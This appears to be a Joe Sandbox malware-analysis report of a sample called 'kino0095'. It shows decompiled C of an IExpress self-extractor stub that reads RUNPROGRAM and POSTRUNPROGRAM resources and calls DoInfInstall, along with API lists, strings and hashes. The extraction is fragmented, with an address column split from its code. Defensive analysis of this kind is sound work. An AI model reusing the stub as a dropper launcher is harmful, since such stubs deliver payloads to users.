10b3fe3 call 10b2267 76->82 77->70 84 10b3dd9-10b3ddb 77->84 85 10b3c9a-10b3c9c 78->85 86 10b3cf1-10b3cf3 78->86 91 10b3f1a-10b3f1c 79->91 87 10b3fab-10b3fd2 call 10b44b9 LocalFree 80->87 88 10b3dfb-10b3dfd 80->88 81->60 82->81 84->80 92 10b3ddd-10b3de1 call 10b202a 84->92 94 10b3c9e-10b3ca3 85->94 95 10b3ca5-10b3ca7 85->95 86->52 90 10b3cf9-10b3d11 call 10b468f 86->90 87->55 88->79 96 10b3e03-10b3e0a 88->96 90->44 90->49 98 10b3f1e-10b3f2d LocalFree 91->98 99 10b3f46-10b3f47 LocalFree 91->99 92->70 102 10b3cb2-10b3cc5 call 10b468f 94->102 95->55 103 10b3cad 95->103 96->79 104 10b3e10-10b3e19 call 10b6495 96->104 106 10b3f33-10b3f3b 98->106 107 10b3fd7-10b3fd9 98->107 99->55 
102->44 112 10b3cc7-10b3ce8 CompareStringA 102->112 103->102 113 10b3e1f-10b3e36 GetProcAddress 104->113 114 10b3f92-10b3fa9 call 10b44b9 104->114 106->40 107->76 112->86 116 10b3cea-10b3ced 112->116 117 10b3e3c-10b3e80 113->117 118 10b3f64-10b3f76 call 10b44b9 FreeLibrary 113->118 125 10b3f7c-10b3f90 LocalFree call 10b6285 114->125 116->86 119 10b3e8b-10b3e94 117->119 120 10b3e82-10b3e87 117->120 118->125 123 10b3e9f-10b3ea2 119->123 124 10b3e96-10b3e9b 119->124 120->119 128 10b3ead-10b3eb6 123->128 129 10b3ea4-10b3ea9 123->129 124->123 125->55 131 10b3eb8-10b3ebd 128->131 132 10b3ec1-10b3ec3 128->132 129->128 131->132 133 10b3ece-10b3eec 132->133 134 10b3ec5-10b3eca 132->134 137 10b3eee-10b3ef3 133->137 138 10b3ef5-10b3efd 133->138 134->133 137->138 139 10b3eff-10b3f09 FreeLibrary 138->139 140 10b3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E010B3BA2() {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                                                    				short _v300;
                                                                                                                                                                                                                                    				intOrPtr _v304;
                                                                                                                                                                                                                                    				void _v348;
                                                                                                                                                                                                                                    				char _v352;
                                                                                                                                                                                                                                    				intOrPtr _v356;
                                                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                                                    				short _v364;
                                                                                                                                                                                                                                    				char* _v368;
                                                                                                                                                                                                                                    				intOrPtr _v372;
                                                                                                                                                                                                                                    				void* _v376;
                                                                                                                                                                                                                                    				intOrPtr _v380;
                                                                                                                                                                                                                                    				char _v384;
                                                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                                                    				intOrPtr _v392;
                                                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                                                    				void* _v408;
                                                                                                                                                                                                                                    				void* _v424;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                    				short _t96;
                                                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                    				signed int _t104;
                                                                                                                                                                                                                                    				signed int _t108;
                                                                                                                                                                                                                                    				int _t112;
                                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                                    				signed char _t118;
                                                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                                                    				short _t137;
                                                                                                                                                                                                                                    				char* _t140;
                                                                                                                                                                                                                                    				signed char _t144;
                                                                                                                                                                                                                                    				signed char _t145;
                                                                                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                                                    				signed int _t157;
                                                                                                                                                                                                                                    				signed int _t162;
                                                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                     				_t164 = (_t162 & 0xfffffff8) - 0x194; // 8-byte aligned frame of 0x194 bytes
                                                                                                                                                                                                                                     				_t69 =  *0x10b8004; // 0x72151d89, the MSVC /GS __security_cookie
                                                                                                                                                                                                                                     				_v8 = _t69 ^ _t164; // cookie XOR frame address saved on the stack; the epilogue compares it before returning
                                                                                                                                                                                                                                    				_t153 = 0;
                                                                                                                                                                                                                                    				 *0x10b9124 =  *0x10b9124 & 0;
                                                                                                                                                                                                                                    				_t149 = 0;
                                                                                                                                                                                                                                    				_v388 = 0;
                                                                                                                                                                                                                                    				_v384 = 0;
                                                                                                                                                                                                                                    				_t165 =  *0x10b8a28 - _t153; // 0x0
                                                                                                                                                                                                                                    				if(_t165 != 0) {
                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                    					_t127 = 0;
                                                                                                                                                                                                                                    					_v392 = 0;
                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                    						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                    						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                    						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                    						_v348 = 0x44;
                                                                                                                                                                                                                                    						if( *0x10b8c42 != 0) {
                                                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                                                    						_t115 = E010B468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                                                    							E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    							 *0x10b9124 = 0x80070714;
                                                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                                                    										_t76 = E010B1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                                                    											return E010B6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                                                    												_t79 = E010B3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                    												LocalFree(_t151); // executed
                                                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                                                    													__eflags =  *0x10b8580;
                                                                                                                                                                                                                                    													if( *0x10b8580 != 0) {
                                                                                                                                                                                                                                    														E010B2267();
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                                                    											__eflags =  *0x10b8180;
                                                                                                                                                                                                                                    											if( *0x10b8180 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                                                    												E010B44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                                                    												 *0x10b9124 = 0x8007042b;
                                                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags =  *0x10b9a34 & 0x00000004;
                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t129 = E010B6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                                                    												E010B44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                    												L65:
				LocalFree(_v408);
				 *0x10b9124 = E010B6285();
				goto L62;
			}
			_t146 = GetProcAddress(_t129, "DoInfInstall"); // DoInfInstall is an advpack.dll export; _t129 is the module handle released with FreeLibrary below
			_v404 = _t146;
			__eflags = _t146;
			if(_t146 == 0) {
				_t146 = 0x4c9;
				__eflags = 0;
				E010B44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
				FreeLibrary(_t129);
				goto L65;
			}
			__eflags =  *0x10b8a30;
			_t151 = _v408;
			_v384 = 0;
			_v368 =  &_v280;
			_t96 =  *0x10b9a40; // 0x3
			_v364 = _t96;
			_t97 =  *0x10b8a38 & 0x0000ffff;
			_v380 = 0x10b9154;
			_v376 = _t151;
			_v372 = 0x10b91e4;
			_v360 = _t97;
			// _v360 accumulates flag bits derived from the stub's global configuration values
			if( *0x10b8a30 != 0) {
				_t97 = _t97 | 0x00010000;
				__eflags = _t97;
				_v360 = _t97;
			}
			_t144 =  *0x10b9a34; // 0x1
			__eflags = _t144 & 0x00000008;
			if((_t144 & 0x00000008) != 0) {
				_t97 = _t97 | 0x00020000;
				__eflags = _t97;
				_v360 = _t97;
			}
			__eflags = _t144 & 0x00000010;
			if((_t144 & 0x00000010) != 0) {
				_t97 = _t97 | 0x00040000;
				__eflags = _t97;
				_v360 = _t97;
			}
			_t145 =  *0x10b8d48; // 0x0
			__eflags = _t145 & 0x00000040;
			if((_t145 & 0x00000040) != 0) {
				_t97 = _t97 | 0x00080000;
				__eflags = _t97;
				_v360 = _t97;
			}
			__eflags = _t145;
			if(_t145 < 0) {
				_t104 = _t97 | 0x00100000;
				__eflags = _t104;
				_v360 = _t104;
			}
			_t98 =  *0x10b9a38; // 0x0
			_v356 = _t98;
			_t130 = _t146;
			 *0x10ba288( &_v384);
			_t101 = _v404(); // indirect call through the DoInfInstall pointer resolved above
			__eflags = _t164 - _t164;
			if(_t164 != _t164) {
				_t130 = 4; // stack-pointer check after the indirect call: ecx = 4 (FAST_FAIL_INCORRECT_STACK)
				asm("int 0x29"); // __fastfail
			}
			 *0x10b9124 = _t101;
			_push(_t129);
			__eflags = _t101;
			if(_t101 < 0) {
				FreeLibrary();
				goto L61;
			} else {
				FreeLibrary();
				_t127 = _v400;
				goto L58;
			}
		}
		__eflags =  *0x10b9a40 - 1; // 0x3
		if(__eflags == 0) {
			goto L37;
		}
		__eflags =  *0x10b8a20;
		if( *0x10b8a20 == 0) {
			goto L37;
		}
		__eflags = _t157;
		if(_t157 != 0) {
			goto L38;
		}
		_v388 = 1;
		E010B202A(_t146); // executed
		goto L37;
	}
	_t146 =  &_v280;
	_t108 = E010B468F("POSTRUNPROGRAM",  &_v280, 0x104); // read the POSTRUNPROGRAM string into a MAX_PATH (0x104) buffer
	__eflags = _t108;
	if(_t108 == 0) {
		goto L25;
	}
	__eflags =  *0x10b8c42;
	if( *0x10b8c42 != 0) {
		goto L69;
	}
	_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff); // LOCALE_INVARIANT, NORM_IGNORECASE: is the command "<None>"?
	__eflags = _t112 == 0;
	if(_t112 == 0) {
		goto L69;
	}
	goto L31;
}
_t118 =  *0x10b8a38; // 0x0
if(_t118 == 0) {
	L23:
	if(_t153 != 0) {
		goto L31;
	}
	_t146 =  &_v276;
	if(E010B468F("RUNPROGRAM",  &_v276, 0x104) != 0) { // read the RUNPROGRAM string into a MAX_PATH buffer
		goto L27;
	}
	goto L25;
}
if((_t118 & 0x00000001) == 0) {
	__eflags = _t118 & 0x00000002;
	if((_t118 & 0x00000002) == 0) {
		goto L62;
	}
	_t140 = "USRQCMD";
	L20:
	_t146 =  &_v276;
	if(E010B468F(_t140,  &_v276, 0x104) == 0) {
		goto L25;
	}
	if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) { // arithmetically equivalent to CompareStringA(...) != 0
		_t153 = 1;
		_v388 = 1;
	}
	goto L23;
}
_t140 = "ADMQCMD";
goto L20;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                                                    						_push(_t130);
                                                                                                                                                                                                                                    						_t146 = 0x104;
                                                                                                                                                                                                                                    						E010B1781( &_v276, 0x104, _t130, 0x10b8c42);
                                                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t130 = "REBOOT";
                                                                                                                                                                                                                                    				_t125 = E010B468F(_t130, 0x10b9a2c, 4);
                                                                                                                                                                                                                                    				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
[Instruction address column of this listing (0x010b3baa to 0x010b3fe8 in the same module; 0x00000000 for lines without an instruction address), separated from its code lines by extraction.]
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3e03
                                                                                                                                                                                                                                    0x010b3e0a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3e15
                                                                                                                                                                                                                                    0x010b3e17
                                                                                                                                                                                                                                    0x010b3e19
                                                                                                                                                                                                                                    0x010b3f94
                                                                                                                                                                                                                                    0x010b3fa4
                                                                                                                                                                                                                                    0x010b3f7c
                                                                                                                                                                                                                                    0x010b3f80
                                                                                                                                                                                                                                    0x010b3f8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f8b
                                                                                                                                                                                                                                    0x010b3e2c
                                                                                                                                                                                                                                    0x010b3e30
                                                                                                                                                                                                                                    0x010b3e34
                                                                                                                                                                                                                                    0x010b3e36
                                                                                                                                                                                                                                    0x010b3f69
                                                                                                                                                                                                                                    0x010b3f6e
                                                                                                                                                                                                                                    0x010b3f70
                                                                                                                                                                                                                                    0x010b3f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f76
                                                                                                                                                                                                                                    0x010b3e3c
                                                                                                                                                                                                                                    0x010b3e43
                                                                                                                                                                                                                                    0x010b3e47
                                                                                                                                                                                                                                    0x010b3e52
                                                                                                                                                                                                                                    0x010b3e56
                                                                                                                                                                                                                                    0x010b3e5c
                                                                                                                                                                                                                                    0x010b3e61
                                                                                                                                                                                                                                    0x010b3e68
                                                                                                                                                                                                                                    0x010b3e70
                                                                                                                                                                                                                                    0x010b3e74
                                                                                                                                                                                                                                    0x010b3e7c
                                                                                                                                                                                                                                    0x010b3e80
                                                                                                                                                                                                                                    0x010b3e82
                                                                                                                                                                                                                                    0x010b3e82
                                                                                                                                                                                                                                    0x010b3e87
                                                                                                                                                                                                                                    0x010b3e87
                                                                                                                                                                                                                                    0x010b3e8b
                                                                                                                                                                                                                                    0x010b3e91
                                                                                                                                                                                                                                    0x010b3e94
                                                                                                                                                                                                                                    0x010b3e96
                                                                                                                                                                                                                                    0x010b3e96
                                                                                                                                                                                                                                    0x010b3e9b
                                                                                                                                                                                                                                    0x010b3e9b
                                                                                                                                                                                                                                    0x010b3e9f
                                                                                                                                                                                                                                    0x010b3ea2
                                                                                                                                                                                                                                    0x010b3ea4
                                                                                                                                                                                                                                    0x010b3ea4
                                                                                                                                                                                                                                    0x010b3ea9
                                                                                                                                                                                                                                    0x010b3ea9
                                                                                                                                                                                                                                    0x010b3ead
                                                                                                                                                                                                                                    0x010b3eb3
                                                                                                                                                                                                                                    0x010b3eb6
                                                                                                                                                                                                                                    0x010b3eb8
                                                                                                                                                                                                                                    0x010b3eb8
                                                                                                                                                                                                                                    0x010b3ebd
                                                                                                                                                                                                                                    0x010b3ebd
                                                                                                                                                                                                                                    0x010b3ec1
                                                                                                                                                                                                                                    0x010b3ec3
                                                                                                                                                                                                                                    0x010b3ec5
                                                                                                                                                                                                                                    0x010b3ec5
                                                                                                                                                                                                                                    0x010b3eca
                                                                                                                                                                                                                                    0x010b3eca
                                                                                                                                                                                                                                    0x010b3ece
                                                                                                                                                                                                                                    0x010b3ed5
                                                                                                                                                                                                                                    0x010b3ed9
                                                                                                                                                                                                                                    0x010b3ee0
                                                                                                                                                                                                                                    0x010b3ee6
                                                                                                                                                                                                                                    0x010b3eea
                                                                                                                                                                                                                                    0x010b3eec
                                                                                                                                                                                                                                    0x010b3eee
                                                                                                                                                                                                                                    0x010b3ef3
                                                                                                                                                                                                                                    0x010b3ef3
                                                                                                                                                                                                                                    0x010b3ef5
                                                                                                                                                                                                                                    0x010b3efa
                                                                                                                                                                                                                                    0x010b3efb
                                                                                                                                                                                                                                    0x010b3efd
                                                                                                                                                                                                                                    0x010b3f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3eff
                                                                                                                                                                                                                                    0x010b3eff
                                                                                                                                                                                                                                    0x010b3f05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f05
                                                                                                                                                                                                                                    0x010b3efd
                                                                                                                                                                                                                                    0x010b3dc7
                                                                                                                                                                                                                                    0x010b3dce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3dd0
                                                                                                                                                                                                                                    0x010b3dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3dd9
                                                                                                                                                                                                                                    0x010b3ddb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3ddd
                                                                                                                                                                                                                                    0x010b3de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3de1
                                                                                                                                                                                                                                    0x010b3d59
                                                                                                                                                                                                                                    0x010b3d65
                                                                                                                                                                                                                                    0x010b3d6a
                                                                                                                                                                                                                                    0x010b3d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3d6e
                                                                                                                                                                                                                                    0x010b3d75
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3d8f

APIs
• memset.MSVCRT ref: 010B3C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010B3CDC
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
  • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
  • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
  • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
  • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
  • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010B8C42), ref: 010B3D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010B3E26
• FreeLibrary.KERNEL32(00000000,?,010B8C42), ref: 010B3EFF
• LocalFree.KERNELBASE(?,?,?,?,010B8C42), ref: 010B3F1F
• FreeLibrary.KERNEL32(00000000,?,010B8C42), ref: 010B3F40
• LocalFree.KERNEL32(?,?,?,?,010B8C42), ref: 010B3F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010B8C42), ref: 010B3F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010B8C42), ref: 010B3F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010B8C42), ref: 010B3FC2
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
• API String ID: 1032054927-1863140292
• Opcode ID: 34cb9c74255fb041221b107135419bfd0725242cb40742e5754bce9b0692718b
• Instruction ID: f48e0d8a8b42efb75fc30505783283265b411964d1cf3b77778fe452d4dd8148
• Opcode Fuzzy Hash: 34cb9c74255fb041221b107135419bfd0725242cb40742e5754bce9b0692718b
• Instruction Fuzzy Hash: EEB1B4706043029BE7709F28D4C5BEB7AE8FB84744F20492EFAD5DA291D775C844C796
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 82%
			E010B1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t59;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                                                    				char* _t148;
                                                                                                                                                                                                                                    				CHAR* _t151;
                                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                                    				CHAR* _t155;
                                                                                                                                                                                                                                    				CHAR* _t156;
                                                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t48 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                                                    				E010B1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                                                    				_t54 = E010B1A84(_t111, _t135);
                                                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                                                    					E010B1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                    					E010B658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                    						E010B1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                                                    						_t57 = E010B66C8(_t156, _t138);
                                                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                    							_t139 = 0x2e;
